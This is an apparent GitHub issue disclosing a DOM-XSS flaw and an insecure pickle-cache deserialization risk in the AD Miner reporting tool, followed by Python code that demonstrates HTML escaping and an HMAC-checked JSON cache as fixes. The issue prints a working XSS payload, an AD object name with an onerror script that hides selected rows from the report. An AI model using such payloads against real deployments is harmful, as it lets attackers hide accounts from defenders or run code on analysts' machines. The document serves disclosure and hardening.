
2 obvious and minor vulnerabilities #225

@k4amos

Hi everyone,

These two vulnerabilities are minor and obvious, and they will likely not be fixed. However, it is important for users of AD Miner who do not carefully review its source code to be aware of them:

1. DOM-XSS

An attacker with control over Active Directory can alter the report generated by AD Miner by exploiting one of the XSS vulnerabilities in its code. For example, he could create or rename an AD object to inject malicious code: ServiceAccount<img style=display:none src=x onerror="setTimeout(function(){var keywords=[' + "'" + 'EDDARD' + "'" + ',' + "'" + 'ServiceAccount' + "'" + '];var rows=document.querySelectorAll(' + "'" + '.ag-row' + "'" + ');rows.forEach(function(row){var text=row.innerText.toUpperCase();var shouldRemove=keywords.some(function(k){return text.includes(k.toUpperCase())});if(shouldRemove){row.remove()}})},500)">


This will exploit the XSS at line 39 of grid_class.py.


When viewing the report, lines containing the words ServiceAccount and EDDARD will be removed after a 0.5s timeout. Other modifications to the AD Miner report are likely possible.


2. Insecure Deserialization

This is obvious, but poisoning AD Miner’s Neo4j cache is easy using a malicious pickle file. That’s why you should never share your Neo4j cache (folder cache_neo4j) with others (RCE).
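Both findings come down to trusting data that crosses a boundary: AD object names flow into report HTML unescaped, and the Neo4j cache is a pickle file that executes whatever it contains on load. The block below is an added illustration, not AD Miner's code and not a patch to grid_class.py (whose internals are not shown in the issue): `render_row_unsafe` is a stand-in for the vulnerable concatenation pattern, `render_row_safe` is the escaped form, and the JSON-plus-HMAC cache functions are a proposed alternative to pickle. `INJECTED_NAME`, the cache payload and the two keys are constructed values.

```python
import hashlib
import hmac
import html
import json
import pickle
import tempfile
from html.parser import HTMLParser
from pathlib import Path

# Constructed AD object name carrying an injected <img onerror=...> tag. It is modelled on
# the renamed-object payload in the issue, shortened: the script body does not matter here.
INJECTED_NAME = (
    'ServiceAccount<img style=display:none src=x '
    'onerror="document.querySelectorAll(\'.ag-row\').forEach(function(r){r.remove()})">'
)


def render_row_unsafe(name: str) -> str:
    """Pattern behind the DOM-XSS: the object name is concatenated into the report HTML as-is."""
    return f'<div class="ag-row">{name}</div>'


def render_row_safe(name: str) -> str:
    """Hardened form: escape & < > " ' so the browser shows the name as literal text."""
    return f'<div class="ag-row">{html.escape(name, quote=True)}</div>'


class _TagCollector(HTMLParser):
    """Records every start tag an HTML parser would see in a fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(fragment: str) -> list[str]:
    """Return the start tags present in a rendered row; an injected name shows up as an extra tag."""
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags


# --- Cache: JSON envelope with a per-installation HMAC instead of pickle (proposed pattern) ---

def write_cache(path: Path, payload: dict, key: bytes) -> None:
    """Serialise with JSON (no code execution on load) and tag the body with HMAC-SHA256."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    path.write_text(json.dumps({"tag": tag, "body": body}), encoding="utf-8")


def read_cache(path: Path, key: bytes) -> dict:
    """Reject a cache file that was not written with this installation's key, then parse JSON."""
    envelope = json.loads(path.read_text(encoding="utf-8"))
    expected = hmac.new(key, envelope["body"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, envelope["tag"]):
        raise ValueError("cache integrity check failed: file was not produced by this installation")
    return json.loads(envelope["body"])


def demo() -> dict:
    """Run both halves and return the observations the lead-in makes claims about."""
    results = {
        "unsafe_tags": tags_in(render_row_unsafe(INJECTED_NAME)),
        "safe_tags": tags_in(render_row_safe(INJECTED_NAME)),
    }
    with tempfile.TemporaryDirectory() as tmp:
        cache = Path(tmp) / "cache.json"
        own_key, other_key = b"local-secret-A", b"local-secret-B"  # constructed keys
        write_cache(cache, {"domains": ["corp.example"]}, own_key)
        results["roundtrip"] = read_cache(cache, own_key)
        try:
            read_cache(cache, other_key)
            results["foreign_key_rejected"] = False
        except ValueError:
            results["foreign_key_rejected"] = True
        # A pickle file dropped in place of the JSON cache is simply unparseable, never executed.
        cache.write_bytes(pickle.dumps({"domains": []}))
        try:
            read_cache(cache, own_key)
            results["pickle_rejected"] = False
        except (ValueError, UnicodeDecodeError):
            results["pickle_rejected"] = True
    return results


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Running `demo()` shows the unsafe row parsing as `div` plus an injected `img`, the escaped row parsing as `div` only, the JSON cache round-tripping under its own key, and both a cache tagged with another key and a pickle file in its place being refused before any content is used. The HMAC key would need to be generated once per installation and kept out of the shared folder; the escaping step applies to every AD-controlled string written into the report, not only names.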
